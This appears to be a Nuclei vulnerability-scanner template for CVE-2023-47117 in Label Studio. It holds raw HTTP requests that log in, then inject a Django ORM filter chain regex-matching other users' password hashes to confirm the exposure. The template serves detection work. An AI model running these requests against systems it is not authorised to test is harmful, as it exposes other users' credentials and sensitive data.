id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.0009
    epss-percentile: 0.38398
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950